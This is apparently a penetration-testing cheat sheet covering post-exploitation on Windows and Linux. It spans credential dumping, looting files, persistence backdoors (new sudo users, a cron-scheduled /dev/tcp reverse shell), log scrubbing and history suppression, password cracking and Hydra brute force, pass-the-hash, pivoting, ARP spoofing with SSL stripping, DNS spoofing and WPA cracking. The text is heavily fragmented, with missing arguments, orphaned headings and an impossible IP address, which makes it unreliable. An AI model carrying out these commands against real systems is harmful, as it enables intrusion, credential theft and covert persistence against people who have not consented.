Windows stores passwords in SAM - Security Account Manager. Passwords are stored differently
depending on the operating system. Up until (and including) Windows 2003 stored the passwords in
LAN Manager (LM) and NT LAN Manager (NTLM). LM is incredibly insecure. From windows vista
and on the system does not use LM, only NTLM. So it is a bit more secure.
LM Hashes
LM hashes can be really easy to crack. The LM part in the example below is the first part.
Loot Windows
Example of NT
Administrator:500:NO PASSWORD*********************:BE134K40129560B46534340292A
We can use fgdump.exe (locate fgdump.exe on kali) to extract NTLM and LM Password
hashes. Run it and there is a file called where the hash is saved. Now you can try
to brute force it.
WCE can steal NTLM passwords from memory in cleartext! There are different versions of WCE,
one for 32 bit systems and one for 64 bit. So make sure you have the right one.
wce32.exe -w
This might be a better technique than using tools like wce and fgdump, since you don't have to upload
any binaries. Get the registry:
Pwdump 7
VNC require a specific password to log in to. So it is not the same password as the user password. If
you have a meterpreter shell you can run the post exploit module to get the VNC password.
use post/windows/gather/credentials/vnc
set session X
Tcp-dump on winfows
You can use meterpreter to easily take a tcp-dump, like this:
# Meterpreter
run packetrecorder -li
run packetrecorder -i 1
Loot Windows
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
# Recursive search
dir /s
This is a great post
Loot Linux
Loot Linux
Loot Linux
Passwords and hashes
First grab the passwd and shadow file.
cat /etc/passwd
cat /etc/shadow
We can crack the password using john the ripper like this:
Interesting files
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
Fast command:
First we need to figure out what interfaces the machine is using: ifconfig. Then we can just start
tapping in on that and start to capture those packets.
Loot Linux
Let's start with the basics. tcpdump - this command will output all network traffic straight to the
terminal. Might be hard to understand if there is a lot of traffic.
-w file.pcap - the w-flag will save the output into the filename of your choice. The traffic is
stored in pcap-format, which is the standard packet-analysis-format.
-s - The default size that tcpdump captures is only 96 bytes. If you want it to capture more you have
to define it yourself -s0 gives you the whole packet.
-c - count. Set how many packets you want to intercept. And then stop. Is useful if you have a non-
interactive shell, this way to can capture packets without having to leave with ctr-c.
Useful commands
This will grep all GET from the wlan0 interface. This will not get any SSL-encrypted traffic.
Once we have dumped some of the traffic we can insert it into metasploit and run psnuffle on it. It
can sniff passwords and usernames from pop3, imap, ftp, and HTTP GET. This is a really easy way
to find usernames and passwords from traffic that you have already dumped, or are in the process of
use auxiliary/sniffer/psnuffle
Loot Linux
Persistence - Rootkit - Backdoor
So if you manage to compromise a system you need to make sure that you do not lose the shell. If you
have used an exploit that messes with the machine the user might want to reboot, and if the user
reboots you will lose your shell.
Or, maybe the way to compromise the machine is really complicated or noisy and you don't want to
go through the hassle of doing it all again. So instead you just create a backdoor that you can enter
fast and easy.
adduser pelle
adduser pelle sudo
Now if the machine has ssh you will be able to ssh into the machine.
useradd pelle
passwd pelle
echo "pelle ALL=(ALL) ALL" >> /etc/sudoers
SSH key
Add key to existing ssh-account.
Cronjob NC
Create cronjob that connects to your machine every 10 minutes. Here is an example using a bash-
reverse-shell. You also need to set up a netcat listener.
crontab -e
*/10 * * * * 0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&1
nc -lvp 5556
crontab -e
*/10 * * * * pelle /path/to/binary
If you have a meterpreter shell you can easily just run persistence.
Backdoor in webserver
You can put a cmd or shell-backdoor in a webserver.
Mysql backdoor
If the machine has nmap installed:
Setuid on text-editor
You can setuid on an editor. So if you can easily enter as a www-data, you can easily escalate to root
through the editor.
With vi it is extremely easy. You just run :shell, and it gives you a shell.
Read this
Cover your tracks
On Linux
Log files
In this file you can read all the logs that syslog log.
For example:
Here you have failed and successful login attempts. SSH, SUDO, and much more.
What it does is simply to copy all lines except the lines that contain your IP-address. And then move
them, and them move them back again.
These logs are not stored in plaintext but instead as binaries. Which makes it a bit harder to clear.
Command history
Cover your tracks
You can set your file-size like this to zero, to avoid storing commands.
export HISTSIZE=0
If you set it when you get shell you won't have to worry about cleaning up the history.
Shred files
Shredding files lets you remove files in a more secure way.
On windows
Clear env
Password Cracking
Password Cracking
Password Cracking
Generate wordlists
Generate Custom Wordlist
If we are able to do a dictionary-attack against a service it is important that we use a good dictionary.
We can use e generic one. But we can also generate a custom wordlist based on certain criteria. That
is what we are going to do in this chapter.
Remember people often use their birth dates, address, street address, pets, family members, etc.
Password rules
The service you want to hack might have specific password rules. Must contain certain characters,
must be of certain length etc.
Then run:
html2dic example.txt
As we all know few password are just simple words. Many use numbers and special characters. To
improve our password list we can use john the ripper. We can input our own rules, or we can just use
the standard john-the-ripper rules
Offline Password Cracking
Identify hash
There are generally speaking three pieces of data we can use to identify a hash.
In order to identify a hash we can either use specialized tools that analyze the hash and then return a
guess on which algorithm it is. An easier way is of course to just look in the documentation of the
software where you found the hashes. It usually says in the documentation or the source code which
type of hash is being used.
If you want to try out the functionality of hashcat or john the ripper you can find example hashes
Look for the specific type of hash you want to crack in the list produced by the following command:
hashcat --help
My hash was a Apache md5, so I will use the corresponding code for it, 1600
-a 0 - straight
Offline Password Cracking
If you do not find the password you can add the john-rules. Which add numbers and such things to
each password.
First you need to combine the passwd file with the shadow file using the unshadow-program.
Rainbow tables
So basically a rainbow table is a precalculated list of passwords. So instead of having to hash the
word you want to try you create a list of hashes. So you do not have to hash them before comparing.
This might take a long time to do, hashing a whole wordlist, but when you do the comparison
between the password and the test-word it will go a lot faster.
findmyhash LM -h 6c3d4c343f999422aad3b435b51404ee:bcd477bfdb45435a34c6a38403ca
If you find a local file inclusion vulnerability you might be able to retrieve two fundamental files from
it. the system registry and the SAM registry. There two files/registries are all we need to get the
Offline Password Cracking
machines hashes. These files can be found in several different locations in windows. Here they are:
So if the manage to get your hands on both of these files you can extract the password hashed like
Online Password Cracking
Port 22 - SSH
hydra -l root -P wordlist.txt ssh
hydra -L userlist.txt -P best1050.txt -s 22 ssh -V
Pass the Hash - Reusing Hashes
So in order to use pass the hash we first need to put the hash in a env variable using the export
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A65618
Remote Desktop
apt-get update
apt-get install freerdp-x11
Pivoting - Port forwarding - Tunneling
We are looking for machines that have at least THREE network interfaces (loopback, eth0, and eth1
(or something)). These machines are connected to other networks, so we can use them to pivot.
# Windows
ipconfig /all
route print
ifconfig -a
What we can do is add a machine that redirect/forward all traffic that it receives on port 80 to port 21
on a different machine.
we will have
Pivoting - Port forwarding - Tunneling
So we can set up this port forwarding machine with the help of rinetd.
To make it clear, we have the following machines: Machine1 - IP: - Behind firewall,
and wants to connect to Machine3. Machine2 - IP: - Forwards incomming
connections to Machine3 Machine3 - IP: 333.333.333.333 - Hosts the ftp-server that machine1 wants
to connect to.
# this is the configuration file for rinetd, the internet redirection server
# you may specify global allow and deny rules here
# only ip addresses are matched, hostnames cannot be specified here
# the wildcards you may use are * and ?
# allow 192.168.2.*
# deny
# forwarding rules come here
# you may specify allow and deny rules after a specific forwarding rule
# to apply to only that forwarding rule
# bindadress bindport connectaddress connectport
# logging information
logfile /var/log/rinetd.log
# uncomment the following line if you want web-server style logfile format
# logcommon
This is the essential part of the configuration file, this is where we create the port-forwarding
/etc/init.d/rinetd restart
So the bind-address is where the proxy receieves the connection, and the connectaddress is the
machine it forwards the connection to.
You want to encrypt traffic that uses unencrypted protocols. Like VNC, IMAP, IRC.
You are on a public network and want to encrypt all your http traffic.
You want to bypass firewall rules.
Pivoting - Port forwarding - Tunneling
nc localhost:10000
Remote port forwarding is crazy, yet very simple concept. So imagine that you have compromised a
machine, and that machine has like MYSQL running but it is only accessible for localhost. And you
can't access it because you have a really crappy shell. So what we can do is just forward that port to
our attacking machine. The steps are as following:
By the way, plink is a ssh-client for windows that can be run from the terminal. The ip of the
attacking machine is
Step 2 Now we can check netstat on our attacking machine, we should see something like this:
That means what we can connect to that port on the attacking machine from the attacking machine.
This can be used to dynamically forward all traffic from a specific application. This is really cool.
With remote and local port forwarding you are only forwarding a single port. But that can be a hassle
if your target machine has 10 ports open that you want to connect to. So instad we can use a dynamic
port forwarding technique.
Dynamic port forwarding sounds really complicated, but it is incredibly easy to set up. Just set up the
tunnel like this. After it is set up do not run any commands in that session.
Since proxychains uses 9050 by defualt (the default port for tor) we don't even need to configure
proxychains. But if you want to change the port you can do that in /etc/proxychains.conf.
proxychains nc 21
So supress all the logs from proxychains you can configure it in the config file.
For this we need two machines. Machine1 - 111.111.1111.111 - The server that works as our proxy.
Machine2 - The computer with the web browser.
First we check out what out public IP adress is, so that we know the IP address before and after, so we
can verify that it works. First you set ssh to:
# On Machine2 we run
ssh -D localhost:9999 root@
Now you go to Firefox/settings/advanced/network and SOCKS you add and port 9999
Notice that this setup probably leaks DNS. So don't use it if you need opsec.
To fix the DNS-leak you can go to about:config in firefox (in the addressbar) then look for
network.proxy.socks_remote_dns, and switch it to TRUE. Now you can check:
But we are not done yet. It still says that we have WebRTC leaks. In order to solve this you can go to
about:config again and set the following to FALSE
I haven't used this, but it might work.
Now we can access this port on our machine locally like this.
nc 3306
Pivoting - Port forwarding - Tunneling
First we want to scan the network to see what devices we can target. In this example we already have
a meterpreter shell on a windows machine with SYSTEM-privileges.
Now that we have a list of all available machines. We want to portscan them.
use auxiliary/scanner/portscan/tcp
If we run that module now it will only scan machines in the network we are already on. So first we
need to connect us into the second network.
Now we add the second network as a new route in metasploit. First we background our session, and
then do this:
# the ip addres and the subnet mask, and then the meterpreter session
route add 1
use auxiliary/scanner/portscan/tcp
This is a good video-explanation:
Network traffic analysis
Arp-spoofing - Sniffing traffic
Step 1
Run nmap or netdiscover to list the devices on the network. netdiscover -r or whatever network range it is. This is good because it is live, and it updates as
soon as new devices connect to the network.
Step 2
echo 1 > /proc/sys/net/ipv4/ip_forward
this command is fundamental. Without changing it to 1you will only block the traffic, but not forward
it. So that will bring down the connection for that person. Denial of service. If you want to do that
make sure it is set to 0. If you want to intercept it make sure it is set to 1.
Step 3
arpspoof -i wlan0 -t
-i is the interface flag. In this example we choose the wlan0 interface. Run ifconfig to see
which interfaces you have available.
-t the target flag. It specifies your target. The first address is the router, and the second is the
specific device you want to target.
urlsnarf -i wlan0
driftnet -i wlan0
Driftnet is pretty cool. It let's you see all the images that is loaded in the targets browser in real time.
Not very useful, but kind of cool.
wireshark. Just open wireshark and select the interface and start capturing.
Tcpdump. Also awesome.
If the user you are intercepting is communicating over HTTPS your interception will trigger an alert
very time a user tried to enter a https-page. This is not what we want. In order do bypass this we can
remove the ssl-part of every request. It is less likely that the user will notice a change from HTTPS to
HTTP in the url-bar.
Penteration Testing - A hands on introduction to hacking. Page 174
This attack can also me called DNS cache posining. This attack is also performed on a already
compromised network. It is pretty much like Arp-spoofing. But instead of relying traffic we are
directing the user to visit a fake web-site that we have set up.
We set up a webpage that is a clone of We intercept the dns-traffic, and everytime the
target sends a request to a dns-server to resolve we intercept that request and directs the
user to our clone.
So now that you have entered a network and intercepted the traffic it is time to analyze that traffic.
That can be with wireshark.
There are two types of filters that we can use.
1. Capture filter
This filters out in the capture process, so that it does not capture what you have not
2. Display filter
This filter just filters what you see. You might have captured 1000 packets, but using the
display filter you will only be shown say 100 packets that are relevant to you.
Capture filter
So if you just start capturing all traffic on a network you are soon going to get stuck with a ton of
packets. Too many! So we might need to refine out capture.
Click on the fourth icon from the left. If you hover over it it says Capture options
Some useful might be. From a specific host and with a specific port:
port 110
Display filter
ip.addr ==
tcp.port eq 25
There are quite a few different security mechanism on wifi. And each of them require a different
tactic. This article outlines the different strategies quite well.
What we are going to to here it basically just to record the 4-way handshake and then run a dictionary
attack on it. The good part about this strategy is that you won't have to interfere to much with the
network and thereby risk of taking down their wifi. The bad part is that if you run a dictionary attack
there is always the possibility that the password just isn't in the list.
1. Start airmon-ng
CH 13 ][ Elapsed: 6 s ]
So what is all this? BSSID - This is the mac-address of the access point. PWR - Signal strength. The
higher (closer to 0) the strength the stronger is the signal. In the example above it is myrouter that has
the strongest signal. Beacon - This is kind of like a packet that the AP sends out periodically. The
beacon contains information about the network. It contains the SSID, timestamp, beacon interval. If
you are curious you can just analyze the beacons in wireshark after you have captured them. #Data -
The number of data-packets that has been sent. #/s - Number of data-packets per second. CH -
Channel MB - Maximum speed the AP can handle. ENC - Encryption type CIPHER - One of CCMP,
WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and
CCMP is typically used with WPA2. PSK - The authentication protocol used. One of MGT
(WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared
key for WPA/WPA2), or OPN (open for WEP). ESSID - The name of the network
Then we have another section of information. Station - MAC address of each associated station or
stations searching for an AP to connect with. Clients not currently associated with an AP have a
BSSID of “(not associated)”. So yeah, this basically means that we can see what devices are looking
for APs. This can be useful if we want to create an evil twin or something like that.
3. Now that we have the handshake recorded we can start to crack it. We can do that by using the
program cowpatty.
4. cowpatty -f /usr/share/wordlists/rockyou.txt -r cowpatty-01.cap
-s DKT_D24D81 Then we just hope for the best.
Kicking other people off the network to capture handshakes faster: http://www.aircrack-
Physical access to machine
Create linux-usb
Just follow this guide for ubuntu
Mount disk
Now you have booted into the live-usb, now we need to mount the hard-drive to the usb-linux-
filesystem. First we want to find out what partitions we have:
sudo su
fdisk -l
This will give you a list of partitions. They will look something like this
mkdir /media/windows
-tmeans type, and refers to the filesystem-type. And we choose ntfs which is the windows-
Now you can access all the files from the harddrive in /media/windows
Physical access to machine
umount /media/windows
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Go null yourself
Hacking - The Art of Exploitation